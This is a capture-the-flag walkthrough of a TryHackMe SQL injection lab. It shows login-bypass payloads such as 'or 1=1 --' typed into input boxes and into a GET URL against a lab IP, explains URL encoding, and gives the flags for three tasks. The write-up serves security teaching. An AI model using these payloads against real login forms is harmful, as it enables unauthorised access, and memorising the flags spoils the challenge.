Try Hack Me: SQL Injection Lab
This is a walkthrough of a machine called SQL Injection Lab of Try Hack Me and demonstrates various SQL Injection Attacks.
TASK 2
SQL Injection 1: Input Box Non-String
Since we got the the IP Address of the machine we scan the IP using nmap to see what kind of service is running on the machine and which ports is open.
Since we can see the http service is also running and also the porst is open we go this webpage
And go to the first one and we can see the login page and and to bypass this login in the user we use query 10 or 1=1 — — and in password we type any string or alphabet and it will redirect it to the new page.
What is the flag for SQL Injection 1: Input Box Non-String?
= THM{dccea429d73d4a6b4f117ac64724f460}
SQL Injection 2: Input Box String
In here we use the same query like above one but in here we will be using strings instead of integers
And by using this query we can also bypass this login and will redirect to a new page containing its flag.
What is the flag for SQL Injection 2: Input Box String?
=THM{356e9de6016b9ac34e02df99a5f755ba}
SQL Injection 3: URL Injection
This uses GET request when submitting the login form like in the previous tasks we will not be typing query in the login page but in URL.
http://10.10.245.66:5000/sesqli3/login?profileID=-1' or 1=1 — -&password=a
By typing this the login and the client side validation can be easily by passed.
The browser will automatically url encode this for us. Url encoding is needed since the HTTP protocol does not support all characters in the request. When url encoded, the URL looks as follows:
http://10.10.245.66:5000/sesqli3/login?profileID=-1%27%20or%201=1--%20-&password=a
The %27 becomes the single quote (‘) character and %20 becomes a blank space.
What is the flag for SQL Injection 3: URL Injection?
= THM{645eab5d34f81981f5705de54e8a9c36}